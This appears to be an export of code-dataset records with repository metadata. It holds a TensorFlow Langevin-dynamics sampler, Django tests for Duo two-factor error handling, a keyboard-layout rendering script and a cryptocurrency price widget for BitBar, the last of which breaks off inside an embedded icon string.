2022-01-29T16:29:13.000Z
|
import tensorflow as tf
@tf.function
def sgld_sample(E, x_initial, num_steps, step_size, var, clip_thresh=tf.constant(0.01), constrain_results=False):
    """
    Do SGLD (stochastic gradient Langevin dynamics) sampling step
    :param E: Energy function
    :param x_initial: initial sample position, of shape (batch_size, ndims)
    :param num_steps: number of sampling steps
    :param step_size: step size used in gradient part
    :param var: variance for isotropic Gaussian used in update
    :param clip_thresh: threshold for gradient clipping; prevents energy gradients from growing too large
    :param constrain_results: Constrain results between 0 and 1
    :return: new sample
    """
    x_k = x_initial
    for _ in range(num_steps):
        # Record ops on the tape so we can differentiate the scalar energy
        # w.r.t. the current sample x_k (a non-variable tensor, hence watch()).
        with tf.GradientTape() as g:
            g.watch(x_k)
            energy = tf.math.reduce_sum(E(x_k, training=False))
        gradient = g.gradient(energy, x_k)
        # Clip the energy gradient elementwise to +/- clip_thresh.
        dE_dx = tf.clip_by_value(gradient, -clip_thresh, clip_thresh)
        # Langevin update: half-step gradient descent plus isotropic
        # Gaussian noise with standard deviation sqrt(var).
        x_k = x_k - (step_size / 2) * dE_dx + tf.random.normal(x_k.shape, mean=0.0, stddev=tf.math.sqrt(var))
        if constrain_results:
            # Keep samples inside [0, 1] (e.g. for image-valued data).
            x_k = tf.clip_by_value(x_k, 0.0, 1.0)
    return x_k
@tf.function
def sgld_sample_diag(E, x_initial, num_steps, step_size, var, clip_thresh=tf.constant(0.01), constrain_results=False):
    """
    Do SGLD (stochastic gradient Langevin dynamics) sampling step, record average gradient magnitude
    :param E: Energy function
    :param x_initial: initial sample position, of shape (batch_size, ndims)
    :param num_steps: number of sampling steps
    :param step_size: step size used in gradient part
    :param var: variance for isotropic Gaussian used in update
    :param clip_thresh: threshold for gradient clipping; prevents energy gradients from growing too large
    :param constrain_results: Constrain results between 0 and 1
    :return: new sample, avg. gradient magnitude
    """
    x_k = x_initial
    # Running sum of per-step mean (clipped) gradient norms; divided by
    # num_steps at the end to yield the average magnitude diagnostic.
    r_s = 0.0
    for _ in range(num_steps):
        # Record ops on the tape so we can differentiate the scalar energy
        # w.r.t. the current sample x_k (a non-variable tensor, hence watch()).
        with tf.GradientTape() as g:
            g.watch(x_k)
            energy = tf.math.reduce_sum(E(x_k, training=False))
        gradient = g.gradient(energy, x_k)
        # Clip the energy gradient elementwise to +/- clip_thresh.
        dE_dx = tf.clip_by_value(gradient, -clip_thresh, clip_thresh)
        # Accumulate the batch-mean L2 norm of the clipped gradient
        # (norm taken along axis=1, i.e. per sample).
        r_s += tf.reduce_mean(tf.linalg.norm(dE_dx, axis=1))
        # Langevin update: half-step gradient descent plus isotropic
        # Gaussian noise with standard deviation sqrt(var).
        x_k = x_k - (step_size / 2) * dE_dx + tf.random.normal(x_k.shape, mean=0.0, stddev=tf.math.sqrt(var))
        if constrain_results:
            # Keep samples inside [0, 1] (e.g. for image-valued data).
            x_k = tf.clip_by_value(x_k, 0.0, 1.0)
    return x_k, r_s / tf.cast(num_steps, tf.float32)
| 45.107143
| 118
| 0.692399
| 400
| 2,526
| 4.175
| 0.23
| 0.023952
| 0.007186
| 0.031138
| 0.905389
| 0.877844
| 0.877844
| 0.877844
| 0.877844
| 0.877844
| 0
| 0.014588
| 0.212985
| 2,526
| 55
| 119
| 45.927273
| 0.825453
| 0.414489
| 0
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.034483
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50291fde1cde1ed4a1f521b7778f5e118537a93a
| 502
|
py
|
Python
|
pybrain/rl/environments/twoplayergames/capturegameplayers/__init__.py
|
sveilleux1/pybrain
|
1e1de73142c290edb84e29ca7850835f3e7bca8b
|
[
"BSD-3-Clause"
] | 2,208
|
2015-01-02T02:14:41.000Z
|
2022-03-31T04:45:46.000Z
|
pybrain/rl/environments/twoplayergames/capturegameplayers/__init__.py
|
sveilleux1/pybrain
|
1e1de73142c290edb84e29ca7850835f3e7bca8b
|
[
"BSD-3-Clause"
] | 91
|
2015-01-08T16:42:16.000Z
|
2021-12-11T19:16:35.000Z
|
pybrain/rl/environments/twoplayergames/capturegameplayers/__init__.py
|
sveilleux1/pybrain
|
1e1de73142c290edb84e29ca7850835f3e7bca8b
|
[
"BSD-3-Clause"
] | 786
|
2015-01-02T15:18:20.000Z
|
2022-02-23T23:42:40.000Z
|
from pybrain.rl.environments.twoplayergames.capturegameplayers.randomplayer import RandomCapturePlayer
from pybrain.rl.environments.twoplayergames.capturegameplayers.killing import KillingPlayer
from pybrain.rl.environments.twoplayergames.capturegameplayers.nonsuicide import NonSuicidePlayer
from pybrain.rl.environments.twoplayergames.capturegameplayers.moduledecision import ModuleDecidingPlayer
from pybrain.rl.environments.twoplayergames.capturegameplayers.clientwrapper import ClientCapturePlayer
| 100.4
| 105
| 0.912351
| 45
| 502
| 10.177778
| 0.377778
| 0.120087
| 0.141921
| 0.272926
| 0.622271
| 0.622271
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037849
| 502
| 5
| 106
| 100.4
| 0.94824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
502ade2ab1b166cba60bf93f6825985514569761
| 12,981
|
py
|
Python
|
psono/restapi/tests/utils/duo.py
|
dirigeant/psono-server
|
a18c5b3c4d8bbbe4ecf1615b210d99fb77752205
|
[
"Apache-2.0",
"CC0-1.0"
] | 48
|
2018-04-19T15:50:58.000Z
|
2022-01-23T15:58:11.000Z
|
psono/restapi/tests/utils/duo.py
|
dirigeant/psono-server
|
a18c5b3c4d8bbbe4ecf1615b210d99fb77752205
|
[
"Apache-2.0",
"CC0-1.0"
] | 9
|
2018-09-13T14:56:18.000Z
|
2020-01-17T16:44:33.000Z
|
psono/restapi/tests/utils/duo.py
|
dirigeant/psono-server
|
a18c5b3c4d8bbbe4ecf1615b210d99fb77752205
|
[
"Apache-2.0",
"CC0-1.0"
] | 11
|
2019-09-20T11:53:47.000Z
|
2021-07-18T22:41:31.000Z
|
from django.test import TestCase
from socket import gaierror
from ssl import SSLError
from mock import patch
import time
from restapi.utils import duo_auth_check, duo_auth_enroll, duo_auth_enroll_status, duo_auth_auth
class TestDuoAuthCheckUtils(TestCase):
    """Unit tests for duo_auth_check().

    Each test patches duo_client.Auth.check with one of the mock_* methods
    below to simulate a Duo API outcome, then checks the dict returned by
    duo_auth_check. The repeated call-and-assert triplet is factored into
    _assert_check_error; test method names are unchanged.
    """

    def mock_check(self):
        # Successful API check: Duo returns the server time.
        return {
            'time': int(time.time())
        }

    def mock_invalid_host(self):
        # DNS resolution failure for the configured API host.
        raise gaierror

    def mock_invalid_cert(self):
        # TLS certificate validation failure.
        raise SSLError

    def mock_invalid_integration_key(self):
        raise RuntimeError('Invalid integration key')

    def mock_invalid_secret_key(self):
        raise RuntimeError('Invalid signature')

    def mock_other_api_error(self):
        raise RuntimeError('Other API Error')

    def mock_duo_offline(self):
        # raise any irregular exception
        raise Exception

    def _assert_check_error(self, expected_error):
        # Helper: run duo_auth_check and assert it reports expected_error.
        result = duo_auth_check('integration_key', 'secret_key', 'host')
        self.assertTrue('error' in result)
        self.assertEqual(result['error'], expected_error)

    @patch('duo_client.Auth.check', mock_check)
    def test_duo_auth_check_success(self):
        result = duo_auth_check('integration_key', 'secret_key', 'host')
        self.assertTrue('time' in result)

    @patch('duo_client.Auth.check', mock_invalid_host)
    def test_duo_auth_check_invalid_host(self):
        self._assert_check_error('Host incorrect: Could not be found')

    @patch('duo_client.Auth.check', mock_invalid_cert)
    def test_duo_auth_check_invalid_cert(self):
        self._assert_check_error('Host incorrect: SSL Certificate Error')

    @patch('duo_client.Auth.check', mock_invalid_integration_key)
    def test_duo_auth_check_invalid_integration_key(self):
        self._assert_check_error('Invalid integration key')

    @patch('duo_client.Auth.check', mock_invalid_secret_key)
    def test_duo_auth_check_invalid_secret_key(self):
        self._assert_check_error('Invalid secret key')

    @patch('duo_client.Auth.check', mock_other_api_error)
    def test_duo_auth_check_other_api_error(self):
        self._assert_check_error('Other API Error')

    @patch('duo_client.Auth.check', mock_duo_offline)
    def test_duo_auth_check_duo_offline(self):
        self._assert_check_error('Duo offline. Try again later.')
class TestDuoAuthEnrollUtils(TestCase):
    """Exercises duo_auth_enroll() against patched duo_client.Auth methods.

    duo_auth_enroll first calls preauth (patched to report 'enroll' so the
    enrollment path is taken) and then enroll, which each mock below either
    satisfies or fails with the exception the helper must map to an 'error'.
    """

    def mock_enroll(self, username):
        # Successful enrollment payload.
        return {
            'time': int(time.time())
        }

    def mock_preauth(self, username):
        # Report the user as not yet enrolled so enroll() is attempted.
        return {
            'result': 'enroll'
        }

    def mock_invalid_host(self, username):
        # Name-resolution failure for the configured host.
        raise gaierror

    def mock_invalid_cert(self, username):
        # TLS certificate validation failure.
        raise SSLError

    def mock_invalid_integration_key(self, username):
        raise RuntimeError('Invalid integration key')

    def mock_invalid_secret_key(self, username):
        raise RuntimeError('Invalid signature')

    def mock_username_already_exists(self, username):
        raise RuntimeError('username already exists')

    def mock_other_api_error(self, username):
        raise RuntimeError('Other API Error')

    def mock_duo_offline(self, username):
        # Any unexpected exception type is reported as Duo being offline.
        raise Exception

    @patch('duo_client.Auth.enroll', mock_enroll)
    @patch('duo_client.Auth.preauth', mock_preauth)
    def test_duo_auth_enroll_success(self):
        # Renamed from 'test_duo_auth_check_success' (copy-paste leftover):
        # this class tests duo_auth_enroll, not duo_auth_check.
        result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
        self.assertIn('time', result)

    @patch('duo_client.Auth.enroll', mock_invalid_host)
    @patch('duo_client.Auth.preauth', mock_preauth)
    def test_duo_auth_enroll_invalid_host(self):
        result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Host incorrect: Could not be found')

    @patch('duo_client.Auth.enroll', mock_invalid_cert)
    @patch('duo_client.Auth.preauth', mock_preauth)
    def test_duo_auth_enroll_invalid_cert(self):
        result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Host incorrect: SSL Certificate Error')

    @patch('duo_client.Auth.enroll', mock_invalid_integration_key)
    @patch('duo_client.Auth.preauth', mock_preauth)
    def test_duo_auth_enroll_invalid_integration_key(self):
        result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Invalid integration key')

    @patch('duo_client.Auth.enroll', mock_invalid_secret_key)
    @patch('duo_client.Auth.preauth', mock_preauth)
    def test_duo_auth_enroll_invalid_secret_key(self):
        result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Invalid secret key')

    @patch('duo_client.Auth.enroll', mock_username_already_exists)
    @patch('duo_client.Auth.preauth', mock_preauth)
    def test_duo_auth_enroll_username_already_exists(self):
        result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Username already exists in Duo.')

    @patch('duo_client.Auth.enroll', mock_other_api_error)
    @patch('duo_client.Auth.preauth', mock_preauth)
    def test_duo_auth_enroll_other_api_error(self):
        # Renamed from 'test_duo_auth_enroll_invalid_other_api_error' for
        # consistency with the sibling test classes.
        result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Other API Error')

    @patch('duo_client.Auth.enroll', mock_duo_offline)
    @patch('duo_client.Auth.preauth', mock_preauth)
    def test_duo_auth_enroll_duo_offline(self):
        # Renamed from 'test_duo_auth_enroll_invalid_duo_offline' for
        # consistency with the sibling test classes.
        result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Duo offline. Try again later.')
class TestDuoAuthEnrollStatusUtils(TestCase):
    """Exercises duo_auth_enroll_status() against a patched
    duo_client.Auth.enroll_status.

    Each mock either returns the 'success' status string or raises the
    exception type the helper must translate into an 'error' entry.
    """

    def mock_enroll_status(self, user_id, activation_code):
        # Successful status poll.
        return 'success'

    def mock_invalid_host(self, user_id, activation_code):
        # Name-resolution failure for the configured host.
        raise gaierror

    def mock_invalid_cert(self, user_id, activation_code):
        # TLS certificate validation failure.
        raise SSLError

    def mock_invalid_integration_key(self, user_id, activation_code):
        raise RuntimeError('Invalid integration key')

    def mock_invalid_secret_key(self, user_id, activation_code):
        raise RuntimeError('Invalid signature')

    def mock_other_api_error(self, user_id, activation_code):
        raise RuntimeError('Other API Error')

    def mock_duo_offline(self, user_id, activation_code):
        # Any unexpected exception type is reported as Duo being offline.
        raise Exception

    @patch('duo_client.Auth.enroll_status', mock_enroll_status)
    def test_duo_auth_enroll_status_success(self):
        # Renamed from 'test_duo_auth_check_success' (copy-paste leftover):
        # this class tests duo_auth_enroll_status, not duo_auth_check.
        result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
        self.assertEqual(result, 'success')

    @patch('duo_client.Auth.enroll_status', mock_invalid_host)
    def test_duo_auth_enroll_status_invalid_host(self):
        result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Host incorrect: Could not be found')

    @patch('duo_client.Auth.enroll_status', mock_invalid_cert)
    def test_duo_auth_enroll_status_invalid_cert(self):
        result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Host incorrect: SSL Certificate Error')

    @patch('duo_client.Auth.enroll_status', mock_invalid_integration_key)
    def test_duo_auth_enroll_status_invalid_integration_key(self):
        result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Invalid integration key')

    @patch('duo_client.Auth.enroll_status', mock_invalid_secret_key)
    def test_duo_auth_enroll_status_invalid_secret_key(self):
        result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Invalid secret key')

    @patch('duo_client.Auth.enroll_status', mock_other_api_error)
    def test_duo_auth_enroll_status_other_api_error(self):
        result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Other API Error')

    @patch('duo_client.Auth.enroll_status', mock_duo_offline)
    def test_duo_auth_enroll_status_duo_offline(self):
        result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Duo offline. Try again later.')
class TestDuoAuthAuthUtils(TestCase):
    """Exercises duo_auth_auth() against a patched duo_client.Auth.auth.

    Each mock either returns an (empty) result dict or raises the exception
    type the helper must translate into an 'error' entry.
    """

    def mock_auth(self, username, factor, device, pushinfo, passcode, async_txn):
        # Successful auth: an empty payload with no 'error' key suffices
        # for the assertions below.
        return {
            # Something
        }

    def mock_invalid_host(self, username, factor, device, pushinfo, passcode, async_txn):
        # Name-resolution failure for the configured host.
        raise gaierror

    def mock_invalid_cert(self, username, factor, device, pushinfo, passcode, async_txn):
        # TLS certificate validation failure.
        raise SSLError

    def mock_invalid_integration_key(self, username, factor, device, pushinfo, passcode, async_txn):
        raise RuntimeError('Invalid integration key')

    def mock_invalid_secret_key(self, username, factor, device, pushinfo, passcode, async_txn):
        raise RuntimeError('Invalid signature')

    def mock_other_api_error(self, username, factor, device, pushinfo, passcode, async_txn):
        raise RuntimeError('Other API Error')

    def mock_duo_offline(self, username, factor, device, pushinfo, passcode, async_txn):
        # Any unexpected exception type is reported as Duo being offline.
        raise Exception

    @patch('duo_client.Auth.auth', mock_auth)
    def test_duo_auth_auth_success(self):
        # Renamed from 'test_duo_auth_check_success' (copy-paste leftover):
        # this class tests duo_auth_auth, not duo_auth_check.
        result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
        self.assertTrue(isinstance(result, dict) and 'error' not in result)

    @patch('duo_client.Auth.auth', mock_invalid_host)
    def test_duo_auth_auth_invalid_host(self):
        result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Host incorrect: Could not be found')

    @patch('duo_client.Auth.auth', mock_invalid_cert)
    def test_duo_auth_auth_invalid_cert(self):
        result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Host incorrect: SSL Certificate Error')

    @patch('duo_client.Auth.auth', mock_invalid_integration_key)
    def test_duo_auth_auth_invalid_integration_key(self):
        result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Invalid integration key')

    @patch('duo_client.Auth.auth', mock_invalid_secret_key)
    def test_duo_auth_auth_invalid_secret_key(self):
        result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Invalid secret key')

    @patch('duo_client.Auth.auth', mock_other_api_error)
    def test_duo_auth_auth_other_api_error(self):
        result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Other API Error')

    @patch('duo_client.Auth.auth', mock_duo_offline)
    def test_duo_auth_auth_duo_offline(self):
        result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
        self.assertIn('error', result)
        self.assertEqual(result['error'], 'Duo offline. Try again later.')
| 41.340764
| 110
| 0.707187
| 1,644
| 12,981
| 5.268856
| 0.046837
| 0.050104
| 0.059801
| 0.076888
| 0.923805
| 0.912607
| 0.876241
| 0.788502
| 0.708151
| 0.669476
| 0
| 0
| 0.17672
| 12,981
| 313
| 111
| 41.472843
| 0.810517
| 0.009938
| 0
| 0.539823
| 0
| 0
| 0.25255
| 0.055274
| 0
| 0
| 0
| 0
| 0.238938
| 1
| 0.261062
| false
| 0.030973
| 0.026549
| 0.022124
| 0.327434
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
503b2ee9818e39c40c49dcffac2c640d4622d371
| 142
|
py
|
Python
|
mysite/test2/views.py
|
GavinZhuLei/GavinsDjango
|
9c977de1b1d521c99853ef0c982070d4a8cae076
|
[
"Apache-2.0"
] | null | null | null |
mysite/test2/views.py
|
GavinZhuLei/GavinsDjango
|
9c977de1b1d521c99853ef0c982070d4a8cae076
|
[
"Apache-2.0"
] | null | null | null |
mysite/test2/views.py
|
GavinZhuLei/GavinsDjango
|
9c977de1b1d521c99853ef0c982070d4a8cae076
|
[
"Apache-2.0"
] | null | null | null |
#__author__ = 'root'
from django.shortcuts import render_to_response
def index(request):
    """Render the test2 landing page.

    Returns the 'test2/index.html' template rendered with an empty context.
    """
    context = {}
    return render_to_response('test2/index.html', context)
| 28.4
| 52
| 0.774648
| 19
| 142
| 5.368421
| 0.789474
| 0.156863
| 0.313725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.105634
| 142
| 5
| 52
| 28.4
| 0.795276
| 0.133803
| 0
| 0
| 0
| 0
| 0.130081
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
504496ae7767b71bd0894baa74c7803853217f6a
| 3,895
|
py
|
Python
|
notes/ideal_keyboard.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | 5
|
2021-04-29T21:07:18.000Z
|
2021-09-29T08:46:08.000Z
|
notes/ideal_keyboard.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | null | null | null |
notes/ideal_keyboard.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | 1
|
2018-04-07T12:26:21.000Z
|
2018-04-07T12:26:21.000Z
|
import kwplot
import numpy as np
import kwimage

kwplot.autompl()

# Pixel scale factor: every key image is (64 * f) x (54 * f).
f = 8

# Base key image: dark gray fill with a 2*f-pixel near-black border.
blank_key = np.zeros((64 * f, 54 * f, 3))
blank_key[:, :, :] = np.array(kwimage.Color('darkgray').as255())[None, None, :]
blank_key[0:f * 2, :] = (3, 3, 3)
blank_key[-f * 2:, :] = (3, 3, 3)
blank_key[:, 0:f * 2] = (3, 3, 3)
blank_key[:, -f * 2:] = (3, 3, 3)

# Quick visual sanity check of a single rendered key.
key = kwimage.draw_text_on_image(blank_key.copy(), text='!\n1', halign='center', valign='center', color='white')
kwplot.imshow(key)


def _render_side(rows):
    """Render one half of the keyboard into a single stacked image.

    Args:
        rows: list of (alt_text, row_text) pairs, one per key row. alt_text
            holds the optional shifted symbol per key (None when absent) and
            row_text the primary label; when present, the symbol is drawn
            above the label.

    Returns:
        The row images stacked vertically with 1-pixel padding.
    """
    row_stack = []
    for alt_text, row_text in rows:
        row_keys = []
        for label, alt in zip(row_text, alt_text):
            # Single characters get a larger glyph; longer labels a smaller one.
            if len(label) == 1:
                fontScale = 4
                thickness = 6
            else:
                fontScale = 1
                thickness = 4
            text = label if alt is None else alt + '\n\n' + label
            # BUG FIX: the original hard-coded fontScale=4 in this call,
            # ignoring the per-label fontScale computed above; pass it through.
            key = kwimage.draw_text_on_image(
                blank_key.copy(), text=text, halign='center', valign='center',
                color='white', fontScale=fontScale, thickness=thickness)
            row_keys.append(key)
        row_stack.append(kwimage.stack_images(row_keys, axis=1, pad=1))
    return kwimage.stack_images(row_stack, axis=0, pad=1)


# Left half: (shifted-symbol row, label row) per physical key row.
left_rows = [
    ([None, None, None, None, None, None, None, None],
     ['esc', 'F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'caps']),
    ([None, '~', '!', '@', '#', '$', '%', None],
     ['tab', '`', '1', '2', '3', '4', '5', 'win']),
    (['|', '?', None, None, None, None, None, None],
     ['\\', '/', 'q', 'w', 'e', 'r', 't', 'del']),
    ([None, None, None, None, None, None, None, None],
     ['shift', 'shift', 'a', 's', 'd', 'f', 'g', 'tab']),
    ([None, None, None, None, None, None, None, None],
     ['ctrl', 'ctrl', 'z', 'x', 'c', 'v', 'b', 'bksp']),
    ([None, None, None, None, None, None, None, None],
     ['alt', 'home', 'pup', 'end', 'pdwn', 'end', 'space', 'enter']),
]
left_side = _render_side(left_rows)

# Right half, mirroring the left-half layout.
right_rows = [
    ([None, None, None, None, None, None, None, None],
     ['Prt\nScn', 'F7', 'F8', 'F9', 'F10', 'F11', 'F12', 'DEL']),
    ([None, '^', '&', '*', '(', ')', '_', '+'],
     ['win', '6', '7', '8', '9', '0', '-', '=']),
    ([None, None, None, None, None, None, '{', '}'],
     ['del', 'y', 'u', 'i', 'o', 'p', '[', ']']),
    ([None, None, None, None, None, ':', None, None],
     ['tab', 'h', 'j', 'k', 'l', ';', 'shift', 'shift']),
    ([None, None, None, '<', '>', '"', None, None],
     ['bksp', 'n', 'm', ',', '.', '\'', 'ctrl', 'ctrl']),
    ([None, None, None, None, None, None, None, None],
     ['enter', 'space', '<', '^', 'V', '>', 'alt', 'alt']),
]
right_side = _render_side(right_rows)

# Compose the two halves with a wide gap between them and display.
image = kwimage.stack_images([left_side, right_side], axis=1, pad=300)
kwplot.imshow(image)
| 30.669291
| 152
| 0.560719
| 572
| 3,895
| 3.620629
| 0.20979
| 0.247224
| 0.301304
| 0.324481
| 0.761468
| 0.761468
| 0.745051
| 0.732496
| 0.701593
| 0.697731
| 0
| 0.040637
| 0.21027
| 3,895
| 126
| 153
| 30.912698
| 0.63264
| 0
| 0
| 0.478261
| 0
| 0
| 0.076508
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032609
| 0
| 0.032609
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ac9bd2104d9d8a3fc9bdf6a48fa0772305e7b7b1
| 77,423
|
py
|
Python
|
c20.30s.py
|
hongkongkiwi/bitbar_c20
|
021ec91b19c612a1dd780774a64865421bc25168
|
[
"MIT"
] | null | null | null |
c20.30s.py
|
hongkongkiwi/bitbar_c20
|
021ec91b19c612a1dd780774a64865421bc25168
|
[
"MIT"
] | null | null | null |
c20.30s.py
|
hongkongkiwi/bitbar_c20
|
021ec91b19c612a1dd780774a64865421bc25168
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# coding=utf-8
#
# <bitbar.title>C20 NAV and Asset Worth</bitbar.title>
# <bitbar.version>v1.0</bitbar.version>
# <bitbar.desc>Displays current C20 NAV and USD asset worth</bitbar.desc>
from urllib import urlopen
url = urlopen('https://crypto20.com/status').read()
btg_url = urlopen('https://api.coinmarketcap.com/v1/ticker/bitcoin-gold/').read()
top_25 = urlopen('https://api.coinmarketcap.com/v1/ticker/?limit=25').read()
import json
result = json.loads(url)
btg_result = json.loads(btg_url)
top_25_result = json.loads(top_25);
number_of_c20 = 123.456 # change this to the number of C20 tokens that you own
# parse out price and put here
symbol_price = {
'bitcoin-gold': btg_result[0]['price_usd']
};
# loop through prices rather than call api more than once
for c in top_25_result:
symbol_price[c['id']] = float(c['price_usd'])
# symbol to name map
symbol_path_map = {
'BTC': 'bitcoin',
'ETH': 'ethereum',
'BCH': 'bitcoin-cash',
'XRP': 'ripple',
'DASH': 'dash',
'LTC': 'litecoin',
'MIOTA': 'iota',
'XMR': 'monero',
'NEO': 'neo',
'XEM': 'nem',
'ETC': 'ethereum-classic',
'LSK': 'lisk',
'QTUM': 'qtum',
'EOS': 'eos',
'ZEC': 'zcash',
'OMG': 'omisego',
'ADA': 'cardano',
'HSR': 'hshare',
'XLM': 'stellar',
'WAVES': 'waves',
'PPT': 'populous',
'STRAT': 'stratis',
'BTS': 'bitshares',
'ARK': 'ark',
'BTG': 'bitcoin-gold'
}
# symbol to icon map
symbol_image_map = {
'C20': 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAlCAYAAAAjt+tHAAAAAXNSR0IArs4c6QAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAACXBIWXMAABYlAAAWJQFJUiTwAAADRGlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iWE1QIENvcmUgNS40LjAiPgogICA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgogICAgICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iCiAgICAgICAgICAgIHhtbG5zOnRpZmY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vdGlmZi8xLjAvIgogICAgICAgICAgICB4bWxuczpleGlmPSJodHRwOi8vbnMuYWRvYmUuY29tL2V4aWYvMS4wLyI+CiAgICAgICAgIDx4bXA6TW9kaWZ5RGF0ZT4yMDE3LTExLTIwVDA3OjExOjYzPC94bXA6TW9kaWZ5RGF0ZT4KICAgICAgICAgPHhtcDpDcmVhdG9yVG9vbD5QaXhlbG1hdG9yIDMuNzwveG1wOkNyZWF0b3JUb29sPgogICAgICAgICA8dGlmZjpPcmllbnRhdGlvbj4xPC90aWZmOk9yaWVudGF0aW9uPgogICAgICAgICA8dGlmZjpSZXNvbHV0aW9uVW5pdD4yPC90aWZmOlJlc29sdXRpb25Vbml0PgogICAgICAgICA8dGlmZjpDb21wcmVzc2lvbj41PC90aWZmOkNvbXByZXNzaW9uPgogICAgICAgICA8ZXhpZjpQaXhlbFhEaW1lbnNpb24+Mjg8L2V4aWY6UGl4ZWxYRGltZW5zaW9uPgogICAgICAgICA8ZXhpZjpDb2xvclNwYWN